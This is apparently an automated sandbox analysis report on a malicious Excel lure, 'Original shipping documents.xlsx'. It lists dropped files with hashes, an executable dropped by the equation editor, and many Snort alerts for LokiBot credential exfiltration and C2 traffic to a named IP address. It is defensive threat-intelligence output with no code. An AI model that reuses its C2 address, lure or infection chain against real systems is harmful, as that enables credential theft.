                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34C1CE78.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                    Category:dropped
                    Size (bytes):14198
                    Entropy (8bit):7.916688725116637
                    Encrypted:false
                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FC47675.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):33795
                    Entropy (8bit):7.909466841535462
                    Encrypted:false
                    SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                    MD5:613C306C3CC7C3367595D71BEECD5DE4
                    SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                    SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                    SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46679E8F.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):65050
                    Entropy (8bit):7.959940260382877
                    Encrypted:false
                    SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                    MD5:22335141D285E599CDAEF99EABA59D5B
                    SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                    SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                    SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58670744.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                    Category:dropped
                    Size (bytes):14198
                    Entropy (8bit):7.916688725116637
                    Encrypted:false
                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                    Malicious:false
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C7DD346.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89D14D5A.emf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):648132
                    Entropy (8bit):2.8123097603136196
                    Encrypted:false
                    SSDEEP:3072:234UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:44UcLe0JOcXuunhqcS
                    MD5:27E280B8E3E495E1824A39E0A2C1FA21
                    SHA1:B4CC1FCD9FF12A0DFA0C58D05EADDA92BD5C3EEA
                    SHA-256:DF2ED56094DC6AA5C2AF4974C2B1D93843E4DBE4627A7C18719B7A1025C4022A
                    SHA-512:94F203A4C6258DA1479C4906D9434280B59BCDA4644F31F3723313473966AE2A215EE1D206C9EC33FA5558ABF0F417680CA999B08F643ADAAB073D09889B624C
                    Malicious:false
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F23CC993.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):65050
                    Entropy (8bit):7.959940260382877
                    Encrypted:false
                    SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                    MD5:22335141D285E599CDAEF99EABA59D5B
                    SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                    SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                    SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                    Malicious:false
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD34C19.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):33795
                    Entropy (8bit):7.909466841535462
                    Encrypted:false
                    SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                    MD5:613C306C3CC7C3367595D71BEECD5DE4
                    SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                    SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                    SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                    Malicious:false
                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)
                    Process:C:\Users\Public\vbc.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):210432
                    Entropy (8bit):6.97232515193582
                    Encrypted:false
                    SSDEEP:3072:2v+ArX9FLxOhanZBsX3PovEuKwEXLqfP6GB6klGfLIQVNWBz:6+KnIanZyHPoqqfSGB6k8Txql
                    MD5:59A67B5CCF01B6A564265797DC5E53E8
                    SHA1:996281D368FCC2CEFE5BF99399CCB19299C6F8FF
                    SHA-256:E4C1C0121487F83B014B8C81BBAF03DB0B7F49584A268A5E67CA64BA6E64676F
                    SHA-512:3BEB988E323C9A9F8DEB04E845DA157E34EC1F564B5CF8681A7ACA490A9FB5A1D4F1D4A10D80AD2D9C7D1742C56B93CFD113352FA80E38C4BAB46695C6F527CD
                    Malicious:false
                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
                    Process:C:\Users\Public\vbc.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                    Process:C:\Users\Public\vbc.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):25990
                    Entropy (8bit):0.6027050180179753
                    Encrypted:false
                    SSDEEP:12:seeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeJ:C
                    MD5:53580B7E5732A1219D4DA536B8FA2999
                    SHA1:9680D4CD528EECA7693619772320868789C3C4E4
                    SHA-256:F15B8D65C47C425332F15BB045DE3273C99AD53782D5F18333ACB8D60FF83418
                    SHA-512:E9F9B4F89D99034CEEB3D2F0D5D47F589818D8DD84F29FA9ACBD69DE120FF5D569853994B2EE88B08D240CD9BDD493AA3B79FED65F73B2AAAB43E9BF8A20474D
                    Malicious:false
                    C:\Users\user\Desktop\~$Original shipping documents.xlsx
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):330
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                    Malicious:false
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    C:\Users\Public\vbc.exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):210432
                    Entropy (8bit):6.97232515193582
                    Encrypted:false
                    SSDEEP:3072:2v+ArX9FLxOhanZBsX3PovEuKwEXLqfP6GB6klGfLIQVNWBz:6+KnIanZyHPoqqfSGB6k8Txql
                    MD5:59A67B5CCF01B6A564265797DC5E53E8
                    SHA1:996281D368FCC2CEFE5BF99399CCB19299C6F8FF
                    SHA-256:E4C1C0121487F83B014B8C81BBAF03DB0B7F49584A268A5E67CA64BA6E64676F
                    SHA-512:3BEB988E323C9A9F8DEB04E845DA157E34EC1F564B5CF8681A7ACA490A9FB5A1D4F1D4A10D80AD2D9C7D1742C56B93CFD113352FA80E38C4BAB46695C6F527CD
                    Malicious:true

                    Static File Info

                    General

                    File type:CDFV2 Encrypted
                    Entropy (8bit):7.988412488949302
                    TrID:
                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                    File name:Original shipping documents.xlsx
                    File size:420472
                    MD5:27eb25e6fbbbd37115055ecc4b557c53
                    SHA1:4c986607a941900d9d8804aa351dcab0cc4de224
                    SHA256:09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab
                    SHA512:f2ece9c11a33e9bf9502f231a89e08256da67e1387b2707e76045fe51d3d0cc3e81d05a1bd2e380d39adbc0cefe8d60113b96b647813c64b7f1bded81ae230d2
                    SSDEEP:6144:fQOdpdVnGAWCDj4TvvuX2sNNtN+Por6ouj38cawe5kA0t8+yWENL/XfOmPKI:4O7cvCbNtUzP3jmiA06+l6Xf5

                    File Icon

                    Icon Hash:e4e2aa8aa4b4bcb4

                    Network Behavior

                    Snort IDS Alerts

                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    09/28/21-06:50:29.583742 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49166 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:29.583742 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49166 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:29.583742 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49166 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:29.583742 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49166 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:30.225629 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49167 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:30.225629 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49167 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:30.225629 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49167 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:30.225629 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49167 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:30.788969 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49168 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:30.788969 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49168 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:30.788969 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49168 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:30.788969 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49168 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:31.149317 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49168 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:31.556288 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49169 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:31.556288 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49169 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:31.556288 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49169 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:31.556288 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49169 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:31.912452 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49169 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:33.578149 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49170 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:33.578149 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49170 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:33.578149 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49170 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:33.578149 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49170 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:33.930838 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49170 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:36.333900 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49171 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:36.333900 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49171 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:36.333900 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49171 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:36.333900 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49171 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:36.694551 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49171 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:36.981514 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49172 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:36.981514 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49172 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:36.981514 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49172 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:36.981514 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49172 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:37.329350 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49172 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:37.611743 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49173 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:37.611743 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49173 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:37.611743 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49173 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:37.611743 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49173 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:37.968483 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49173 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:38.271242 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49174 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:38.271242 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49174 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:38.271242 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49174 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:38.271242 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49174 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:38.657722 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49174 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:38.967765 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49175 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:38.967765 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49175 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:38.967765 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49175 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:38.967765 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49175 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:39.323179 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49175 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:39.638770 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49176 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:39.638770 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49176 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:39.638770 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49176 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:39.638770 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49176 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:40.025614 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49176 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:40.313216 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49177 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:40.313216 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49177 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:40.313216 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49177 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:40.313216 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49177 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:40.677573 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49177 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:40.962632 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49178 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:40.962632 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49178 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:40.962632 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49178 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:40.962632 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49178 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:41.324284 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49178 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:41.640230 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49179 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:41.640230 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49179 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:41.640230 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49179 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:41.640230 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49179 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:42.012145 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49179 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:42.299756 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49180 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:42.299756 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49180 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:42.299756 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49180 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:42.299756 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49180 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:42.665060 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49180 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:42.959616 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49181 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:42.959616 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49181 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:42.959616 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49181 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:42.959616 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49181 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:43.342382 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49181 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:43.668918 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49182 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:43.668918 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49182 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:43.668918 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49182 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:43.668918 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49182 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:44.033988 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49182 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:44.317407 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49183 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:44.317407 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49183 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:44.317407 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49183 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:44.317407 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49183 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:44.690879 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49183 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:44.980669 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49184 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:44.980669 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49184 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:44.980669 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49184 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:44.980669 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49184 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:45.327651 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49184 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:45.606333 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49185 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:45.606333 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49185 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:45.606333 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49185 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:45.606333 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49185 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:45.970264 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49185 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:46.257926 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49186 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:46.257926 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49186 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:46.257926 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49186 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:46.257926 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49186 | 80 | 192.168.2.22 | 5.188.89.50
